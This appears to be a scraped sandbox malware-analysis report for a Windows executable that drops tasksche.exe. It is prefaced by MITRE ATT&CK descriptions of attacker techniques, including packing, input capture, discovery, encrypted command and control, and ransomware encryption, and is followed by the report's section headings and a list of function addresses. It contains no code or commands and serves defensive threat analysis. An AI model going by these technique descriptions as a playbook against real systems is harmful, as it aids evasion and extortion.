Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.
Tactics:	Discovery
Data Sources:	Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.
Tactics:	Impact
Data Sources:	File monitoring, Kernel drivers, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report onq54JS79W.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Windows\tasksche.exe

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

Windows Analysis Report
onq54JS79W.exe

Function 00407CE0 Relevance: 50.9, APIs: 18, Strings: 11, Instructions: 175
libraryloaderfileCOMMON

Function 00407C40 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 54
serviceCOMMON

Function 00409A16 Relevance: 16.6, APIs: 11, Instructions: 111
COMMON

Function 00408140 Relevance: 6.0, APIs: 4, Instructions: 45
networkCOMMON

Function 00408090 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49
serviceCOMMON

Function 00408090 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49
serviceCOMMON

Function 00409A16 Relevance: 16.6, APIs: 11, Instructions: 111
COMMON

Function 00408140 Relevance: 6.0, APIs: 4, Instructions: 45
networkCOMMON

Function 00407C40 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 54
serviceCOMMON

Function 00407CE0 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 175
libraryloaderCOMMON

Function 00406C40 Relevance: 30.1, APIs: 13, Strings: 4, Instructions: 365
COMMONCrypto

Function 00401A45 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 56
libraryloaderCOMMON

Function 00401CE8 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 75
serviceCOMMON

Function 00402A76 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 334
COMMONCrypto

Function 0040350F Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 214
COMMONCrypto

Function 00403797 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 214
COMMONCrypto

Function 004029CC Relevance: 3.8, APIs: 3, Instructions: 55
memoryCOMMON

Function 00402E7E Relevance: 3.3, APIs: 2, Instructions: 272
COMMONCrypto

Function 004031BC Relevance: 3.3, APIs: 2, Instructions: 271
COMMONCrypto

Function 004043B7 Relevance: 1.9, APIs: 1, Instructions: 682
COMMONCrypto

Function 004018B9 Relevance: 1.5, APIs: 1, Instructions: 25
encryptionCOMMON

Function 00404C19 Relevance: .3, Instructions: 331
COMMONCrypto

Function 0040541F Relevance: .1, Instructions: 104
COMMONCrypto

Function 0040170A Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 65
libraryloaderCOMMON

Function 00407136 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 272
COMMON

Function 0040203B Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 106
stringfileCOMMON

Function 004010FD Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 100
registrystringCOMMON

Function 00401B5F Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 123
COMMON

Function 004021E9 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 233
memoryCOMMON

Function 00401AF6 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 45
COMMON

Function 00401064 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63
processsynchronizationCOMMON

Function 004077BA Relevance: 12.1, APIs: 8, Instructions: 77
COMMON

Function 00407831 Relevance: 12.1, APIs: 8, Instructions: 72
COMMON

Function 004027DF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 121
COMMON

Function 00401225 Relevance: 10.6, APIs: 7, Instructions: 87
COMMON

Function 00407070 Relevance: 10.6, APIs: 7, Instructions: 74
stringCOMMON

Function 00401EFF Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35
sleepCOMMON

Function 00403A77 Relevance: 9.1, APIs: 6, Instructions: 123
COMMON

Function 004018F9 Relevance: 7.6, APIs: 5, Instructions: 79
filememoryCOMMON

Function 00405BAE Relevance: 6.1, APIs: 4, Instructions: 93
fileCOMMON

Function 00402924 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73
COMMON